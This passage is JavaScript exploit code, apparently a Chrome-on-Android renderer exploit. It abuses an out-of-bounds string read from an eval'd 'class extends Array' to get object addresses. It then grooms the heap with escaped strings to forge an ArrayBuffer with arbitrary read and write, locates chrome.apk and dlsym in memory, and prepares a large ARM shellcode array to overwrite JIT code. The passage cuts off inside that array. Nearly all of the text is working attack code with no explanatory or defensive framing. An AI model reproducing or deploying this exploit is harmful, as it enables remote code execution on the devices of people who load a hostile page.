var obj = {};
var oob = "/re/";
//oob = oob.replace("re","*".repeat(0x2000));
oob = oob.replace("re","*".repeat(0x100000));
var str = 'class x extends Array{'+oob+"}";
var fun = eval(str);
Object.assign(obj,fun);
return obj;
}
var obWin;
function makeOobString(){
var hiddenValue = getHiddenValue();
var magicStr = "bbbb";
var arr=[];
var str = 'class x extends Array{}';
for(var i=0;i<str.length;i++){
arr[i]=str.charCodeAt(i);
}
var ob = new Array(0x200);
ob.fill(0x31313131);
gc();
gc();
str=String.fromCharCode.apply(null,arr);
ob=ob.concat(0x32323232);
var fun = eval(str);
ob[2]=str;
ob[3]=ob;
Object.assign(fun,hiddenValue);
var oobString = fun.toString();
gc();
gc();
print("begin search");
var subStr = oobString.substr(0,0x8000);
var pos = subStr.indexOf(magicStr);
print("end search");
if(pos==-1){
print("find magic failed");
postMessage(false);
self.close();
print("unpossible");
throw "error";
}else{
print("find magic at "+pos);
}
oobString = oobString.substr(pos,ob.length*4);
obWin=ob;
return oobString;
}
var oobString = makeOobString();
print("get oob string successfully");
function print(){
console.log.apply(null,arguments);
/*document.write('<p >');
document.write.apply(document,arguments);
document.write("<p>");*/
}
function str2arr(str,len){//len must be multile of 4
if(len===undefined)
len = str.length;
var u8a = new Uint8Array(len);
for(var i=0;i<len;i++){
u8a[i] = str.charCodeAt(i);
}
return new Uint32Array(u8a.buffer);
}
function pArrayInHex(arr){
var result="<p style='font-size:8px'>";
for(var i=0;i<arr.length;i++){
result+=(arr[i]+0x100000000).toString(16).substr(-8);
result+=" ";
if(i%8==7)
result+="<p style='font-size:8px'>";
}
result+="<p>";
print(result);
//alert(result);
return result;
}
function pStrInHex(str){
//var result="<p style='font-size:8px'>";
var result="\n";
for(var i=0;i<str.length;i++){
var code = str.charCodeAt(i);
result+=(code+0x100).toString(16).substr(-2);
if(i%4==3)
result+=" ";
if(i%32==31)
// result+="<p style='font-size:8px'>";
result+="\n";
}
// result+="<p>";
result+="\n";
print(result);
return result;
}
function getObjAddr(obj){
obWin[0]=obj;
var value2= ((str2arr(oobString,4))[0]);
return value2>>>0;
}
var getObj24BitsAddr = function(){
var smi=0;
var code = 0;
var i=0;
//don't allocate heap object
function getAddr(obj){
obWin[0]=obj;
value=0;
code = 0;
i=0;
for(i=2;i>=0;i--){
code = oobString.charCodeAt(i);
value = code+value*256;
}
return value;
}
return getAddr;
}();
var lengthInOldSpace = 0xfffffffc;
var abarr=new Array(800);
function sprayVM(){
var i=0;
var j=0;
try{
for(i=0;i<20;i++){
var u8 = new Uint8Array(0x10000000-0x500);
abarr[i]=u8;
}
}catch(e){}
try{
for(j=0;j<100;j++){
var u8 = new Uint8Array(0x8000000-0x500);
abarr[i+j]=u8;
}
}catch(e){}
print("allocate "+i+" 256M "+j+" 16M ")
function getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min)) + min;
}
delete abarr[getRandomInt(0,i)];
}
function getNewSpaceAddrs(){
/*var kMaxRegularHeapObjectSize =523776;// 507136;
var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
str+="%";*/
var objsInNewSpace = new Array(80);
for(var i=0;i<objsInNewSpace.length;i++){
//var xx=escape(str);
var xx = new Array(0x70000/4);
objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;
//使newspace更离散
new Uint8Array(0x100000-0x500);
new Uint8Array(0x100000-0x500);
}
function compareNumbers(a, b) {
return a - b;
}
objsInNewSpace = Array.from(new Set(objsInNewSpace));
objsInNewSpace = objsInNewSpace.sort(compareNumbers);
return objsInNewSpace;
}
print("begin get new space address");
var objsInNewSpace = getNewSpaceAddrs();
while(objsInNewSpace.length<16){
objsInNewSpace = getNewSpaceAddrs();
print("new space addresses");
pArrayInHex(objsInNewSpace);
}
try{
sprayVM();
}catch(e){}
var selectedTrunk = 0;
var selectedStr = "";
function bruteForceFengShui(){
var huge_str = "x".repeat(0x100000-0x9000);//-0x9000
huge_str +="%";
var hold = new Array(100);
//var holdaddress = new Array(100);
for(var i=0;;i++){
var large = escape(huge_str);
var addr = getObjAddr(large);
//console.log(addr.toString(16) + " "+i);
if(i<hold.length){
hold[i]=large;
//holdaddress[i]=addr;
}
addr=(addr&0xfff00000)>>>0;
addr = addr-0x100000;
if(objsInNewSpace.indexOf(addr)!=-1){
selectedTrunk = addr;
selectedStr = large;
abarr.fill(1);
hold.fill(1);
//holdaddress.fill(1);
break;
}
if(i===150){
/*i=0;
print("tried 200 times");
abarr.fill(1);
try{
sprayVM();
}catch(e){};*/
postMessage(false);
close();
throw "exceed limits";
}
}
}
bruteForceFengShui();
//to avoid allocate memory latter, initilize here
var nextTrunk = selectedTrunk + 0x100000;
//生成一块足够大的可读写内存
var huge_str = "eval('');";
//8000不能太大,太大会使new_space增大
for(var i=0;i<8000;i++) huge_str += 'a.a;';
huge_str += "return 10;";
var huge_func = new Function('a',huge_str);
huge_func({});
function fillNewSpace(origObj){
//first object in new space at 0x8100, new spaces layout
//0x40000
//0x37f00
//.....
//0x40000
var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25
var gap = gap+"%";
//flat gap
gap.substr(0,100);
var fillstr = "%20a".repeat((0x40000-12)/4);
fillstr = escape(fillstr);
var addr=0;
for(var i=0;i<0x100;i++){
addr = getObj24BitsAddr(origObj);
if((addr&0xfffff)===0x8101)
origObj=escape(gap);
else
origObj=unescape(fillstr);
}
}
function findNewSpace(){
var kMaxRegularHeapObjectSize =523776;// 507136;
var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
str+="%";
for(var i=0;;i++){
var xx=escape(str);
var straddr = getObjAddr(xx);
addr=(straddr&0xfff00000)>>>0;
if(addr===selectedTrunk){
print("good state "+straddr.toString(16));
break;
}
}
}
function myencode(str){
var arr = [];
for(var i=0;i<str.length;i++){
if(i%2==1)
arr.push(str.charCodeAt(i));
else{
arr.push(37);//%
var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);
arr.push(hexstr.charCodeAt(0));
arr.push(hexstr.charCodeAt(1));
}
}
return String.fromCharCode.apply(null,arr);
}
var dArray = [];
var index = (0x8100-36)*2;
for(var i=0;i<0x20000/8;i++){
dArray[i]=str_to_double("%03x%03x");
}
var occulen = 0;
var i = 0;
var savedChunk = new Uint8Array(0x8100);
var hiddenValue = getHiddenValue();
var arr=[];
fillNewSpace(new String);
findNewSpace();
var classStr = 'class x extends Array{}';
for(var i=0;i<classStr.length;i++){
arr[i]=classStr.charCodeAt(i);
}
var magicStr = String.fromCharCode(0x86,0x24);
classStr=String.fromCharCode.apply(null,arr);
var ab = new ArrayBuffer(0x1243);
var fun = eval(classStr);
Object.assign(fun,hiddenValue);
var oobStr = fun.toString();
/*(gdb) x/20xw 0x5600c45c array buffer layout
* 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020
* 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000
*/
//overwrite huge string as array buffer
var abLengthIndex = oobStr.indexOf(magicStr);
var strArrayBuffer = oobStr.substr(abLengthIndex-12,32);
//replace the byteLength
var LengthAddr = getObjAddr(lengthInOldSpace);
var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);
var strBase = "\x00\x00\x00\x00";
strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);
strArrayBuffer = myencode(strArrayBuffer);
for(var i=0;i<strArrayBuffer.length/8;i++){
var d = strArrayBuffer.substr(i*8,8);
dArray[index/8+i] = str_to_double(d);
}
var classStrAddr = getObjAddr(classStr)>>>0;
//set read position
var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head
//length control the length of unscaped string, generated string has 12 bytes head
//left 0x1000*2 bytes to avoid gc
var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);
//save the the chunk head to be corrupted
var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;
var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);
for(var i =0;i<savedThunkStr.length;i++){
savedChunk[i] = savedThunkStr.charCodeAt(i);
}
var pos1=new String;
var pos1addr = getObj24BitsAddr(pos1)-1;
//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray
occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);
//minus the length of double array
if(occulen<0x40000+16+8)
throw "no enough room";
occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray
if(occulen%4!==0)
throw "length don't align";
var arrocc=new Array((occulen/4));
//set unescape write position
var occDoubleArray = dArray.concat();
var b=unescape(subOobStr);
//restore the corrupted chunk head
var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);
for(var i=0;i<savedChunk.length;i++){
u8[i] = savedChunk[i];
}
print("long string allocated at "+classStrAddr.toString(16));
if(typeof(selectedStr)==="string"){
print("overwrite failed");
postMessage(false);
close();
return;
//throw "overwrite failed";
}
var fakeab = selectedStr;
print("faked array buffer byte length is "+fakeab.byteLength.toString(16));
var globaldv = new Uint32Array(fakeab);
function read_uint32(from_address){
var u32 = globaldv[(from_address/4)>>>0];
return u32>>>0;
}
function read_uint8(from_address){
from_address = from_address>>>0;
var index = (from_address/4)>>>0;
var mask = from_address%4;
var u32 = globaldv[index];
u32 = u32<<8*(3-mask);
return u32>>>24;
}
function read_uint32_unalign(from_address){
var u32 = 0;
for(var i=3;i>=0;i--){
var u8 = read_uint8(from_address+i);
u32 = u32*0x100+u8;
}
return u32>>>0;
}
//rw to execute
//get function point of v8::internal::Accessors::ReconfigureToDataProperty
function getFixedFunctionPoint(fakeab){
var FunctionAddress = getObjAddr(Function);
var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);
var map = u32[0];
u32 = new Uint32Array(fakeab,map-1,0x1000);
//instance descriptors
var descriptors = u32[7];
u32 = new Uint32Array(fakeab,descriptors-1,0x1000);
var lengthAccessorInfo = u32[6];
u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);
var setterForeign = u32[4];
u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);
var functionPoint = u32[1];
return functionPoint-1;
}
var funPoint = getFixedFunctionPoint(fakeab);
print("ReconfigureToDataProperty at"+funPoint.toString(16));
var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval
var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000
print("chrome.apk base at "+point.toString(16));
function find(startAddr,len,pattern){
for(var i=0; i<(len-pattern.length); i++ ) {
for(var j=0;j<pattern.length;j++){
var temp = read_uint8(startAddr+i+j);
//print(temp.toString(16));
if(temp!=pattern[j]) break;
}
if(j==pattern.length) return startAddr+i;
}
print("find failed");
}
var pattern_position=find(point,0x10000000,pattern);
print("find pattern at "+to_hex(pattern_position));
function get_dest_from_blx(addr) {
var val = read_uint32_unalign(addr);
var s = (val & 0x400) >> 10;
var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
var i10h = val & 0x3ff;
var i10l = (val & 0x7fe0000) >> 17;
var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
return ((addr + 4) & ~3) + off;
}
function backup_original_code(start_address){
var backup_arr = [];
set_access_address(start_address);
var u8arr=new Uint8Array(faked_ab);
for(var i=0;i<shellcode.length+4096;i++){
backup_arr[i]=u8arr[i];
}
return backup_arr;
}
function restore_original_code(start_address,backup_arr){
set_access_address(start_address);
var u8arr=new Uint8Array(faked_ab);
for(var i=0;i<shellcode.length+4096;i++){
u8arr[i]=backup_arr[i];
}
}
huge_func({});
print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4)));
var dlsym_addr = get_dest_from_blx(pattern_position-4);
print("dlsym address is "+to_hex(dlsym_addr));
var huge_func_address = getObjAddr(huge_func)-1;
print("huge func address is "+to_hex(huge_func_address));
for(var i=0;i<20;i++){
print(to_hex(read_uint32(huge_func_address+i*4)));
}
var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4
print("huge func code entry is "+to_hex(huge_func_code_entry));
print(to_hex(read_uint32(huge_func_code_entry)));
//var so_str= "";
var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x